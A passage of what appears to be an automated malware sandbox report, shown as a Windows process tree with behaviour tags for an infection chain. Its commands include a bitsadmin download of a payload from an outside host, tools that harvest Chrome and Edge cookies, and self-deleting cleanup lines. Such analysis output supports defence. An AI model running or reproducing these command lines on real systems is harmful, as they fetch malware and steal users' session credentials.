                                                                                          • Suspicious use of FindShellTrayWindow
                                                                                          PID:2260
                                                                                          • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                                                                            "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                                                                            14⤵
                                                                                              PID:2812
                                                                                        • C:\Users\Admin\AppData\Local\Temp\5d-6ce18-064-8ed80-5e6b36f94da25\Kubetuqaewae.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\5d-6ce18-064-8ed80-5e6b36f94da25\Kubetuqaewae.exe"
                                                                                          12⤵
                                                                                          • Checks computer location settings
                                                                                          PID:5892
                                                                                          • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exe
                                                                                            dw20.exe -x -s 2508
                                                                                            13⤵
                                                                                              PID:4296
                                                                              • C:\Users\Admin\Documents\TqnIcpPPJcA1cKXai5hsB4PB.exe
                                                                                "C:\Users\Admin\Documents\TqnIcpPPJcA1cKXai5hsB4PB.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                PID:4996
                                                                                • C:\Users\Admin\Documents\TqnIcpPPJcA1cKXai5hsB4PB.exe
                                                                                  "C:\Users\Admin\Documents\TqnIcpPPJcA1cKXai5hsB4PB.exe"
                                                                                  7⤵
                                                                                  • Modifies data under HKEY_USERS
                                                                                  PID:5704
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4996 -s 808
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  • Adds Run key to start application
                                                                                  • Program crash
                                                                                  PID:744
                                                                              • C:\Users\Admin\Documents\GbFfcKetbeyrKgP7hwcmqFxl.exe
                                                                                "C:\Users\Admin\Documents\GbFfcKetbeyrKgP7hwcmqFxl.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                • Suspicious use of SetThreadContext
                                                                                PID:4748
                                                                                • C:\Users\Admin\Documents\GbFfcKetbeyrKgP7hwcmqFxl.exe
                                                                                  "{path}"
                                                                                  7⤵
                                                                                  • Executes dropped EXE
                                                                                  • Loads dropped DLL
                                                                                  • Checks processor information in registry
                                                                                  PID:3960
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im GbFfcKetbeyrKgP7hwcmqFxl.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\GbFfcKetbeyrKgP7hwcmqFxl.exe" & del C:\ProgramData\*.dll & exit
                                                                                    8⤵
                                                                                      PID:4664
                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                        taskkill /im GbFfcKetbeyrKgP7hwcmqFxl.exe /f
                                                                                        9⤵
                                                                                        • Kills process with taskkill
                                                                                        PID:2644
                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                        timeout /t 6
                                                                                        9⤵
                                                                                        • Delays execution with timeout.exe
                                                                                        PID:5612
                                                                                • C:\Users\Admin\Documents\4HUTeA_1oUNxJ34ZRl9imAJE.exe
                                                                                  "C:\Users\Admin\Documents\4HUTeA_1oUNxJ34ZRl9imAJE.exe"
                                                                                  6⤵
                                                                                  • Executes dropped EXE
                                                                                  PID:4812
                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:5012
                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:5692
                                                                                  • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                    7⤵
                                                                                      PID:800
                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                      7⤵
                                                                                        PID:1840
                                                                                    • C:\Users\Admin\Documents\eDI0OyMfJG2w_JDtQ0V0kx2M.exe
                                                                                      "C:\Users\Admin\Documents\eDI0OyMfJG2w_JDtQ0V0kx2M.exe"
                                                                                      6⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:1800
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 660
                                                                                        7⤵
                                                                                        • Program crash
                                                                                        PID:3960
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 672
                                                                                        7⤵
                                                                                        • Program crash
                                                                                        PID:4744
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 688
                                                                                        7⤵
                                                                                        • Program crash
                                                                                        PID:3720
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 740
                                                                                        7⤵
                                                                                        • Program crash
                                                                                        PID:5084
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1116
                                                                                        7⤵
                                                                                        • Program crash
                                                                                        PID:4644
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1148
                                                                                        7⤵
                                                                                        • Program crash
                                                                                        PID:5176
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1800 -s 1156
                                                                                        7⤵
                                                                                        • Program crash
                                                                                        PID:5288
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /c taskkill /im "eDI0OyMfJG2w_JDtQ0V0kx2M.exe" /f & erase "C:\Users\Admin\Documents\eDI0OyMfJG2w_JDtQ0V0kx2M.exe" & exit
                                                                                        7⤵
                                                                                          PID:5540
                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                            taskkill /im "eDI0OyMfJG2w_JDtQ0V0kx2M.exe" /f
                                                                                            8⤵
                                                                                            • Kills process with taskkill
                                                                                            PID:5812
                                                                                      • C:\Users\Admin\Documents\hsynJW8ijcKQfgfgvk1vGqh_.exe
                                                                                        "C:\Users\Admin\Documents\hsynJW8ijcKQfgfgvk1vGqh_.exe"
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Checks processor information in registry
                                                                                        PID:4740
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im hsynJW8ijcKQfgfgvk1vGqh_.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\hsynJW8ijcKQfgfgvk1vGqh_.exe" & del C:\ProgramData\*.dll & exit
                                                                                          7⤵
                                                                                            PID:6012
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              taskkill /im hsynJW8ijcKQfgfgvk1vGqh_.exe /f
                                                                                              8⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:5168
                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                              timeout /t 6
                                                                                              8⤵
                                                                                              • Delays execution with timeout.exe
                                                                                              PID:5648
                                                                                        • C:\Users\Admin\Documents\6wE7PJCfUKehAKQ8uXkNY1N2.exe
                                                                                          "C:\Users\Admin\Documents\6wE7PJCfUKehAKQ8uXkNY1N2.exe"
                                                                                          6⤵
                                                                                            PID:4532
                                                                                            • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                              "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                                              7⤵
                                                                                              • Executes dropped EXE
                                                                                              • Drops startup file
                                                                                              PID:3840
                                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                8⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:5852
                                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                                                8⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:5720
                                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                8⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:5708
                                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                8⤵
                                                                                                • Executes dropped EXE
                                                                                                • Loads dropped DLL
                                                                                                • Checks SCSI registry key(s)
                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                PID:4912
                                                                                              • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                8⤵
                                                                                                  PID:968
                                                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                  8⤵
                                                                                                    PID:5228
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                    8⤵
                                                                                                      PID:4780
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                      8⤵
                                                                                                        PID:1772
                                                                                                    • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                      "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Checks whether UAC is enabled
                                                                                                      PID:992
                                                                                                    • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                      "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:5072
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                        8⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:6136
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                        8⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:6084
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                        8⤵
                                                                                                          PID:5048
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                          8⤵
                                                                                                            PID:2560
                                                                                                      • C:\Users\Admin\Documents\aHC_c963dB2JUl65hQcwoK3f.exe
                                                                                                        "C:\Users\Admin\Documents\aHC_c963dB2JUl65hQcwoK3f.exe"
                                                                                                        6⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:1324
                                                                                                      • C:\Users\Admin\Documents\afoQiuDbaZVR9gSoWG3fogMJ.exe
                                                                                                        "C:\Users\Admin\Documents\afoQiuDbaZVR9gSoWG3fogMJ.exe"
                                                                                                        6⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        • Drops file in Program Files directory
                                                                                                        PID:3192
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscA338.tmp\tempfile.ps1"
                                                                                                          7⤵
                                                                                                            PID:4264
                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscA338.tmp\tempfile.ps1"
                                                                                                            7⤵
                                                                                                              PID:6080
                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscA338.tmp\tempfile.ps1"
                                                                                                              7⤵
                                                                                                                PID:5844
                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscA338.tmp\tempfile.ps1"
                                                                                                                7⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Drops file in Program Files directory
                                                                                                                PID:4532
                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscA338.tmp\tempfile.ps1"
                                                                                                                7⤵
                                                                                                                  PID:5788
                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscA338.tmp\tempfile.ps1"
                                                                                                                  7⤵
                                                                                                                    PID:5064
                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscA338.tmp\tempfile.ps1"
                                                                                                                    7⤵
                                                                                                                    • Checks for any installed AV software in registry
                                                                                                                    PID:5828
                                                                                                                  • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                    "bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z
                                                                                                                    7⤵
                                                                                                                    • Download via BitsAdmin
                                                                                                                    PID:4260
                                                                                                                  • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                    "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pQLV9quaGdLErsKh -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                    7⤵
                                                                                                                    • Drops file in Program Files directory
                                                                                                                    PID:4156
                                                                                                                  • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                                                                    "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pfsY50a76TFlsHmZ -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                                                                    7⤵
                                                                                                                      PID:5096
                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscA338.tmp\tempfile.ps1"
                                                                                                                      7⤵
                                                                                                                        PID:5296
                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscA338.tmp\tempfile.ps1"
                                                                                                                        7⤵
                                                                                                                          PID:5900
                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscA338.tmp\tempfile.ps1"
                                                                                                                          7⤵
                                                                                                                            PID:5472
                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscA338.tmp\tempfile.ps1"
                                                                                                                            7⤵
                                                                                                                              PID:4212
                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscA338.tmp\tempfile.ps1"
                                                                                                                              7⤵
                                                                                                                                PID:5820
                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  8⤵
                                                                                                                                    PID:4260
                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                  C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\hdvAaRs\hdvAaRs.dll" hdvAaRs
                                                                                                                                  7⤵
                                                                                                                                  • Loads dropped DLL
                                                                                                                                  PID:5856
                                                                                                                                  • C:\Windows\system32\rundll32.exe
                                                                                                                                    C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\hdvAaRs\hdvAaRs.dll" hdvAaRs
                                                                                                                                    8⤵
                                                                                                                                    • Loads dropped DLL
                                                                                                                                    • Drops file in System32 directory
                                                                                                                                    PID:4296
                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscA338.tmp\tempfile.ps1"
                                                                                                                                  7⤵
                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                  PID:3896
                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscA338.tmp\tempfile.ps1"
                                                                                                                                  7⤵
                                                                                                                                    PID:4912
                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscA338.tmp\tempfile.ps1"
                                                                                                                                    7⤵
                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                    PID:4712
                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscA338.tmp\tempfile.ps1"
                                                                                                                                    7⤵
                                                                                                                                      PID:5472
                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nscA338.tmp\tempfile.ps1"
                                                                                                                                      7⤵
                                                                                                                                        PID:5804
                                                                                                                                      • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                                                                        "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                                                                        7⤵
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        PID:4792
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                                                                                  4⤵
                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                  PID:4008
                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zSCF6D2A94\sonia_6.exe
                                                                                                                                    sonia_6.exe
                                                                                                                                    5⤵
                                                                                                                                    • Executes dropped EXE
                                                                                                                                    • Adds Run key to start application
                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                    PID:364
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                      6⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:1496
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                      6⤵
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      PID:4492
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                      6⤵
                                                                                                                                        PID:3432
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                        6⤵
                                                                                                                                          PID:4488
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                                                                                      4⤵
                                                                                                                                        PID:3612
                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2524 -s 476
                                                                                                                                        4⤵
                                                                                                                                        • Program crash
                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                        PID:2096
                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                                                  1⤵
                                                                                                                                    PID:1232
                                                                                                                                  • c:\windows\system32\svchost.exe
                                                                                                                                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                                                    1⤵
                                                                                                                                      PID:1080
                                                                                                                                    • c:\windows\system32\svchost.exe
                                                                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                                                      1⤵
                                                                                                                                      • Drops file in System32 directory
                                                                                                                                      PID:860
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\eshdsse
                                                                                                                                        C:\Users\Admin\AppData\Roaming\eshdsse
                                                                                                                                        2⤵
                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                        PID:5708
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\eshdsse
                                                                                                                                          C:\Users\Admin\AppData\Roaming\eshdsse
                                                                                                                                          3⤵
                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                          PID:1508
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\jhhdsse
                                                                                                                                        C:\Users\Admin\AppData\Roaming\jhhdsse
                                                                                                                                        2⤵
                                                                                                                                        • Checks SCSI registry key(s)
                                                                                                                                        PID:4808
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\eshdsse
                                                                                                                                        C:\Users\Admin\AppData\Roaming\eshdsse
                                                                                                                                        2⤵
                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                        PID:3092
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\eshdsse
                                                                                                                                          C:\Users\Admin\AppData\Roaming\eshdsse
                                                                                                                                          3⤵
                                                                                                                                            PID:3048
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\eshdsse
                                                                                                                                          C:\Users\Admin\AppData\Roaming\eshdsse
                                                                                                                                          2⤵
                                                                                                                                            PID:3240
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\eshdsse
                                                                                                                                              C:\Users\Admin\AppData\Roaming\eshdsse
                                                                                                                                              3⤵
                                                                                                                                                PID:3496
                                                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                                                                                                                            1⤵
                                                                                                                                              PID:1000
                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                              1⤵
                                                                                                                                              • Suspicious use of SetThreadContext
                                                                                                                                              • Modifies registry class
                                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                                                              PID:2112
                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                2⤵
                                                                                                                                                • Checks processor information in registry
                                                                                                                                                • Modifies registry class
                                                                                                                                                PID:1328
                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                2⤵
                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                • Checks processor information in registry
                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                PID:4320
                                                                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                                                                C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                2⤵
                                                                                                                                                  PID:4276
                                                                                                                                                  • C:\Windows\system32\WerFault.exe
                                                                                                                                                    C:\Windows\system32\WerFault.exe -u -p 4276 -s 500
                                                                                                                                                    3⤵
                                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                    • Program crash
                                                                                                                                                    PID:1172
                                                                                                                                              • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                1⤵
                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                                                PID:2892
                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                  2⤵
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  • Modifies registry class
                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                  • Suspicious use of WriteProcessMemory
                                                                                                                                                  PID:1200
                                                                                                                                              • C:\Windows\system32\rUNdlL32.eXe
                                                                                                                                                rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                1⤵
                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                PID:5512
                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                  rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                                                                  2⤵
                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                  PID:5444
                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                1⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:5684
                                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                                                                1⤵
                                                                                                                                                • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                                                PID:6012
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\EF0F.exe
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\EF0F.exe
                                                                                                                                                1⤵
                                                                                                                                                • Loads dropped DLL
                                                                                                                                                PID:2176
                                                                                                                                              • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                1⤵
                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                • Modifies Internet Explorer settings
                                                                                                                                                • Modifies registry class
                                                                                                                                                • Suspicious use of SetWindowsHookEx
